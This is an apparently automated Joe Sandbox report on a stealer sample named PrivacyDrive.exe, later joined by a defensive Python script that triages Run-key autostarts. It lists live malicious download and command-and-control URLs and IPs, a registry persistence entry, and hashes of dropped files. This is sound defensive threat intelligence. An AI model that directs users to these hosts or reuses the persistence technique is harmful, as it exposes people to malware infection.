    https://finalstepgo.com/a | svchost.exe, 00000003.00000002.2896914287.0000024B090FA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://racedsuitreow.shop/apisP | PrivacyDrive.exe, 00000004.00000002.2152306256.0000000001712000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://crl.thawte.com/ThawteTimestampingCA.crl0 | PrivacyDrive.exe.2.dr | false | URL Reputation: safe | unknown
    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr | false | Avira URL Cloud: safe | unknown
    https://racedsuitreow.shop/3 | PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://www.thawte.com/cps0/ | PrivacyDrive.exe.2.dr | false | Avira URL Cloud: safe | unknown
    https://www.thawte.com/repository0W | PrivacyDrive.exe.2.dr | false | Avira URL Cloud: safe | unknown
    https://racedsuitreow.shop:443/api | PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://racedsuitreow.shop/apie | PrivacyDrive.exe, 00000008.00000003.2028857496.00000000015EF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028967735.00000000015F1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://www.cybertronsoft.com | PrivacyDrive.exe.2.dr | false | Avira URL Cloud: safe | unknown
    https://finalstepgo.com:443/uploads/il222.zipe | svchost.exe, 00000003.00000002.2896766529.0000024B09085000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://crl.thawte.com/ThawtePremiumServerCA.crl0 | PrivacyDrive.exe.2.dr | false | Avira URL Cloud: safe | unknown
    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000003.00000003.1721693277.0000024B092C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.255.122.133 | finalstepgo.com | Netherlands | 42237 | ICMESE | true
172.67.206.221 | racedsuitreow.shop | United States | 13335 | CLOUDFLARENETUS | true

IP
127.0.0.1
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1519581
          Start date and time:2024-09-26 17:45:31 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 56s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowscmdlinecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.win@13/30@4/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 90%
          • Number of executed functions: 25
          • Number of non-executed functions: 275
• Excluded processes (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:46:24 | API Interceptor | 40x Sleep call for process: powershell.exe modified
11:46:27 | API Interceptor | 2x Sleep call for process: svchost.exe modified
11:46:47 | API Interceptor | 3x Sleep call for process: PrivacyDrive.exe modified
11:47:08 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
16:46:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RATU0Beb C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
16:46:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RATU0Beb C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
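The two Autostart rows record the persistence this sample sets up: a Run value with a random-looking name (RATU0Beb) pointing at a copy of PrivacyDrive.exe in a random-looking directory under %APPDATA%\Roaming. The Python below is an added triage example, not Joe Sandbox code and not part of this report: given Run values exported as (name, command line) pairs, it applies the two checks a responder would run by hand, whether the image launches from a user-writable drop location and whether the value name or its parent directory looks machine-generated. The input list is constructed for the example (its first entry mirrors the autostart in this report, the rest are made up), and the directory list and randomness thresholds are illustrative heuristics, not established detection rules.

```python
"""Heuristic triage of HKCU\\...\\Run autostart values.

Added example for this report; not Joe Sandbox code. Input is a list of
(value name, command line) pairs as exported from the Run key. The drop
directories and thresholds are heuristics chosen for illustration.
"""
import re
from typing import Dict, List, Tuple

# Drop locations from which a legitimate Run value rarely launches (lower-case).
SUSPICIOUS_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")

# Constructed sample: the first entry mirrors the autostart recorded in this
# report; the other three are made up to show the non-matching cases.
SAMPLE_RUN_VALUES: List[Tuple[str, str]] = [
    ("RATU0Beb", r"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"),
    ("OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("Updater", r'"C:\Users\user\AppData\Local\Temp\upd.exe" -silent'),
]


def image_path(command: str) -> str:
    """Extract the executable path from a Run value's command line.

    A quoted path ends at the closing quote; an unquoted one is cut at the
    first '.exe' followed by whitespace or end of string (paths with spaces
    are common under Program Files), otherwise at the first space.
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    match = re.match(r"(.+?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return match.group(1) if match else command.split(" ", 1)[0]


def looks_random(token: str) -> bool:
    """Cheap 'machine-generated name' test (heuristic).

    Splits the letters into CamelCase/acronym segments and flags tokens whose
    case flips too often for a human-chosen name (OIlqJYuE -> 5 segments in
    8 letters, OneDrive -> 2), or that sandwich digits between letters (RATU0Beb).
    """
    letters = re.sub(r"[^A-Za-z]", "", token)
    if len(letters) < 6:
        return False
    segments = re.findall(r"[A-Z][a-z]+|[A-Z]+(?![a-z])|[a-z]+", letters)
    digit_inside = re.search(r"[A-Za-z]\d+[A-Za-z]", token) is not None
    return len(segments) / len(letters) > 0.45 or digit_inside


def triage_run_values(entries: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Return one finding, with its reasons, per Run value that trips any heuristic."""
    findings: List[Dict[str, object]] = []
    for name, command in entries:
        path = image_path(command).replace("/", "\\")
        reasons: List[str] = []
        lowered = path.lower()
        hit = next((d for d in SUSPICIOUS_DIRS if d in lowered), None)
        if hit:
            reasons.append(f"image launched from {hit}")
        parts = path.split("\\")
        parent = parts[-2] if len(parts) >= 2 else ""
        if looks_random(parent):
            reasons.append(f"random-looking directory name {parent!r}")
        if looks_random(name):
            reasons.append(f"random-looking value name {name!r}")
        if reasons:
            findings.append({"name": name, "image": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage_run_values(SAMPLE_RUN_VALUES):
        print(finding["name"], finding["image"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

On the constructed sample the report's entry trips all three checks (Roaming drop path, random directory OIlqJYuE, random value name), the made-up Temp entry trips only the path check, and the two benign entries are not reported. Treat the name heuristic as a tie-breaker: it will also fire on some legitimate auto-generated value names, so the drop-path check carries the weight.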
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.255.122.133 | http://clicktogo.click | malicious | Unknown | clicktogo.click/
172.67.206.221 | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC |
 | LcDQjpdIiU.exe | malicious | LummaC |
 | BLHvvl44N0.exe | malicious | LummaC, Go Injector, LummaC Stealer |
 | LcDQjpdIiU.exe | malicious | LummaC |
 | ptgl503.exe | malicious | LummaC |
 | 0x000e00000001da78-93.exe | malicious | LummaC |
 | https://finalsteptogo.com/uploads/pnk333.zip | malicious | LummaC, Go Injector, LummaC Stealer |
 | file.exe | malicious | LummaC, Vidar |
 | file.exe | malicious | LummaC |
 | file.exe | malicious | LummaC, Vidar |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
racedsuitreow.shop | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 172.67.206.221
 | p37SE6gM52.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.37.97
 | iq2HxA0SLw.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.37.97
 | file.exe | malicious | LummaC | 104.21.37.97
 | LcDQjpdIiU.exe | malicious | LummaC | 172.67.206.221
 | BLHvvl44N0.exe | malicious | LummaC, Go Injector, LummaC Stealer | 172.67.206.221
 | LcDQjpdIiU.exe | malicious | LummaC | 172.67.206.221
 | ptgl503.exe | malicious | LummaC | 172.67.206.221
 | 0x000e00000001da78-93.exe | malicious | LummaC | 172.67.206.221
 | LaWl4DY2kW.exe | malicious | LummaC | 104.21.37.97
finalstepgo.com | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 185.255.122.133
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFuNzdj0L4FdhJ5nCR-2FN4hC1EQvQl8aYTZmJnyL7UprLPl6jm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNGQFMsovO-2BDIfDd8om-2B0qBy65B6YpFy69QbHhs-2BHgEvOHFjaifdzxTG-2BoF-2FuDOLuTHm54RFjvuOkCJR7XiPuWrmSEludVLuruwujukWEHVWjC-2FDPwQVnY-2FWYeUOeUMiIJrlK0jhCMy-2FOFonKAMquJlmIQ-2BNXYSWrqTiWYFVkmmc7dzn5iK5psvIGTET-2BqxX8Q6Ayw2yLioyuMU4tX-2FlK-2FnxZVZw2UMS4dooTbsupKHmMJQfuS7sr7nP8dfybIqm2g-3D#Na2FybEBsYXN0d2FsbC5jb20= | malicious | Unknown | 172.67.159.66
 | http://0e0hshi.trafiklite.com/ | malicious | HTMLPhisher | 104.17.25.14
 | https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B | malicious | Unknown | 104.21.67.246
 | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 172.67.206.221
 | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFuNzdj0L4FdhJ5nCR-2FN4hC1EQvQl8aYTZmJnyL7UprLPl6jm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNGQFMsovO-2BDIfDd8om-2B0qBy65B6YpFy69QbHhs-2BHgEvOHFjaifdzxTG-2BoF-2FuDOLuTHm54RFjvuOkCJR7XiPuWrmSEludVLuruwujukWEHVWjC-2FDPwQVnY-2FWYeUOeUMiIJrlK0jhCMy-2FOFonKAMquJlmIQ-2BNXYSWrqTiWYFVkmmc7dzn5iK5psvIGTET-2BqxX8Q6Ayw2yLioyuMU4tX-2FlK-2FnxZVZw2UMS4dooTbsupKHmMJQfuS7sr7nP8dfybIqm2g-3D#Na2FybEBsYXN0d2FsbC5jb20= | malicious | Unknown | 104.21.34.107
 | https://qrco.de/bfQgn5 | malicious | Unknown | 188.114.97.3
 | https://www.sendspace.com/pro/qy2iy1 | malicious | HTMLPhisher | 104.17.25.14
 | https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylink | malicious | EvilProxy, HTMLPhisher | 172.67.74.152
 | z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1a | malicious | Unknown | 104.26.8.129
ICMESE | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 185.255.122.133
 | https://finalsteptogo.com/uploads/il4.txt | malicious | Unknown | 185.255.122.133
 | http://finalsteptogo.com | malicious | Unknown | 185.255.122.133
 | https://finalsteptogo.com/uploads/pnk333.zip | malicious | LummaC, Go Injector, LummaC Stealer | 185.255.122.133
 | tr9.txt.ps1 | malicious | Unknown | 185.255.122.133
 | http://clicktogo.click | malicious | Unknown | 185.255.122.133
 | QtGui4.dll | malicious | Unknown | 185.255.122.14
 | QtGui4.dll | malicious | Unknown | 185.255.122.14
 | ExeFile (242).exe | malicious | Nanocore | 185.217.1.176
 | http://nhbmp.crptecnologia.com/4IPiOX13247BLaM1207nrxukbsbkr14555RITOCMGDOZBIOFM6540MWYR15626W17 | malicious | Phisher | 91.236.116.25
Match | Associated Sample Name / URL | Detection | Threat Name | Context
28a2c9bd18a11de089ef85a160da29e4 | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 185.255.122.133
 | https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFuNzdj0L4FdhJ5nCR-2FN4hC1EQvQl8aYTZmJnyL7UprLPl6jm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNGQFMsovO-2BDIfDd8om-2B0qBy65B6YpFy69QbHhs-2BHgEvOHFjaifdzxTG-2BoF-2FuDOLuTHm54RFjvuOkCJR7XiPuWrmSEludVLuruwujukWEHVWjC-2FDPwQVnY-2FWYeUOeUMiIJrlK0jhCMy-2FOFonKAMquJlmIQ-2BNXYSWrqTiWYFVkmmc7dzn5iK5psvIGTET-2BqxX8Q6Ayw2yLioyuMU4tX-2FlK-2FnxZVZw2UMS4dooTbsupKHmMJQfuS7sr7nP8dfybIqm2g-3D#Na2FybEBsYXN0d2FsbC5jb20= | malicious | Unknown | 185.255.122.133
 | https://qrco.de/bfQgn5 | malicious | Unknown | 185.255.122.133
 | https://www.sendspace.com/pro/qy2iy1 | malicious | HTMLPhisher | 185.255.122.133
 | http://clck.ru/3DSS5H | malicious | Unknown | 185.255.122.133
 | http://a1034295.xsph.ru/vew/ye/worke/ | malicious | Unknown | 185.255.122.133
 | http://a1034295.xsph.ru/favicon.ico | malicious | Unknown | 185.255.122.133
 | https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg | malicious | Unknown | 185.255.122.133
 | https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1a | malicious | Unknown | 185.255.122.133
 | https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEe | malicious | Unknown | 185.255.122.133
3b5074b1b5d032e5620f69f9f700ff0e | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 185.255.122.133
 | https://qrco.de/bfQgn5 | malicious | Unknown | 185.255.122.133
 | https://www.sendspace.com/pro/qy2iy1 | malicious | HTMLPhisher | 185.255.122.133
 | http://a1034295.xsph.ru/vew/ye/worke/ | malicious | Unknown | 185.255.122.133
 | z64BLPL.exe | malicious | Snake Keylogger, VIP Keylogger | 185.255.122.133
 | https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1a | malicious | Unknown | 185.255.122.133
 | https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEe | malicious | Unknown | 185.255.122.133
 | file.exe | malicious | Unknown | 185.255.122.133
 | https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH | malicious | Unknown | 185.255.122.133
 | TLS20242025.exe | malicious | Snake Keylogger, VIP Keylogger | 185.255.122.133
a0e9f5d64349fb13191bc781f81f42e1 | https://finalstepgo.com/uploads/il2.txt | malicious | LummaC | 172.67.206.221
 | https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH | malicious | Unknown | 172.67.206.221
 | 0.dll | malicious | Bazar Loader, BruteRatel, Latrodectus | 172.67.206.221
 | DropboxInstaller.exe | malicious | Unknown | 172.67.206.221
 | DropboxInstaller.exe | malicious | Unknown | 172.67.206.221
 | http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE | malicious | WinSearchAbuse | 172.67.206.221
 | file.exe | malicious | SmokeLoader | 172.67.206.221
 | p37SE6gM52.exe | malicious | LummaC, Go Injector, LummaC Stealer | 172.67.206.221
 | 3ZD5tEC5DH.exe | malicious | LummaC | 172.67.206.221
 | a7HdB2dU5P.exe | malicious | LummaC | 172.67.206.221
                              No context
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):1.3258627147897735
                              Encrypted:false
                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrW:KooCEYhgYEL0In
                              MD5:B0E07EEAD2754656DB0445A04B7F8E67
                              SHA1:5BAE55C9AFC07A25013DC00768B7CF18F0D0FE7D
                              SHA-256:77246B2A5767425122AC1EF60CF1A39ADF44F677D540AC522D20125A0B66F95B
                              SHA-512:4925225EE5D470194A6CEC7D59E768C703F71D6810657F716A6697168968481F4E68810D808BF97A03D099D37C83B7030F2CC4DA404EB7A396509698DB2BB878
                              Malicious:false
                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0dfd3e4c, page size 16384, DirtyShutdown, Windows version 10.0
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.4221307465671799
                              Encrypted:false
                              SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                              MD5:906962F093C46FDE900BB5395773A91A
                              SHA1:C6AF3F9C4EE86411811436BDB226453FAFE17BE8
                              SHA-256:6A0692C477FDB913E444C2937331C4F407C9AB87D92C103B83F484E0916680E7
                              SHA-512:FCD8B252E41EA51833CB38147B21A423EB69A3AD73AAC13F6C77A1DBD5A55BA0F210F1CFCC0122D482202145611C5CE5E9D2211CDFF9B3935F0EFF8F6E242C5E
                              Malicious:false
                              Preview:..>L... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................:.*.....|=................../.a.....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.07755689921382056
                              Encrypted:false
                              SSDEEP:3:n/8YeJgRWjn13a/M0q/sZKvollcVO/lnlZMxZNQl:/8zJgRW53q2/4KQOewk
                              MD5:64CA0858D9D04A02F82272376F91D571
                              SHA1:D6466EE3AD39CF60173AA3E7AF2F2439D1123F64
                              SHA-256:D3349FF99C06D065DF78B192C27F4B5AF5849619A6F644145B3A9CA092149C47
                              SHA-512:48FB9D57655E184A678488459FD9886FE0809DC1A0FC22B1A70DE2AD7CCCFBDDB5350AB3CDF74429C36EB81E12F202464AA74B29B83A86386F9DED0AA263BB24
                              Malicious:false
                              Preview:.lWc.....................................;...{.......|.......{A..............{A......{A..........{A]................./.a.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.0968956902063205
                              Encrypted:false
                              SSDEEP:192:QKK8VGzYj00FxNEyUjTcZr8kF9azuiFb9Z24IO8ZA:QKK8YEjvFxNijSazuiFb9Y4IO8e
                              MD5:22DECCCF0721C379A7F5BA8298772C5C
                              SHA1:DBFAD8BA9ADAA90E756D1BD4C59F88BB0BDEB2A3
                              SHA-256:6D16A0087DEDCD40DE5721C58B197B295FA293B3617B8BDE0232914F2884932A
                              SHA-512:C9A6650909392173DF67580C460CEF7321050FDC287B15878211E1DD7956855152D427EF05342C3908BA0E1FCD4C6A5FF748C8A5DF3922AD5F29C9E12937E02F
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.0.8.9.4.7.1.1.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.b.e.3.f.f.3.-.0.8.2.3.-.4.5.8.e.-.b.9.3.3.-.1.e.f.0.7.a.8.5.2.0.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.c.b.a.c.4.1.-.e.b.a.7.-.4.2.0.c.-.b.d.e.c.-.0.e.6.3.4.1.d.4.1.c.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.8.-.0.0.0.1.-.0.0.1.4.-.c.1.1.6.-.0.d.4.5.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.0.8.b.4.f.2.!.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.1././.0.1.:.0.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.0966247460314005
                              Encrypted:false
                              SSDEEP:192:YY8VGzYm00FxNJ6yUjTcZr8kF9azuiFb9Z24IO8ZA:V8YEmvFxNJMjSazuiFb9Y4IO8e
                              MD5:85B7CD5FAC6DBB3A7BE894531EB79F90
                              SHA1:5E4F2AF6ADBF1297A1755095515429FC97ADE774
                              SHA-256:0B36281554FFA82A06C89A7614B1C935A2DAE3ACC8C9EB00E4E706A9487F22A4
                              SHA-512:E33D086C35F5CCE9F28B1237CDB4F68F7C9ECF17FBD5699555281D9410130A7E12699F6636ABFC768919B723EE916B3C65ABFDBFAF79B10BE9E4726783EB0FB4
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.0.5.1.0.8.0.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.a.0.1.c.a.3.-.8.5.f.0.-.4.b.c.e.-.8.d.1.a.-.3.4.d.c.9.a.9.4.1.5.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.a.c.0.5.a.a.-.c.f.b.2.-.4.d.e.5.-.a.f.b.6.-.8.1.b.a.3.0.b.8.4.d.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.8.-.0.0.0.1.-.0.0.1.4.-.c.1.1.6.-.0.d.4.5.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.0.8.b.4.f.2.!.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.1././.0.1.:.0.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.101823322915865
                              Encrypted:false
                              SSDEEP:192:xDiRGzYzq0BU/OyUjZaZr8kF9azuiFb9Z24IO8qA:Vi8EzxBU/gjCazuiFb9Y4IO8j
                              MD5:86D14B06F4275663AF9A15462E9C2594
                              SHA1:81EE6EF947C10A6472A203E297567A22AD6E0688
                              SHA-256:0E3F3D2F029AF6CFA256C37A2AF2A1EDD1C797EBD4E3F9369039B2D4E2D0FCED
                              SHA-512:6B4152ABF84F89B89D7B343E420656E7D750A4077784132C0BF43E81F16CB699A2F96DBAC9BCB4BCA112D04E55A54B78E94B79AFE4CB64F606490781ADBEB41D
                              Malicious:true
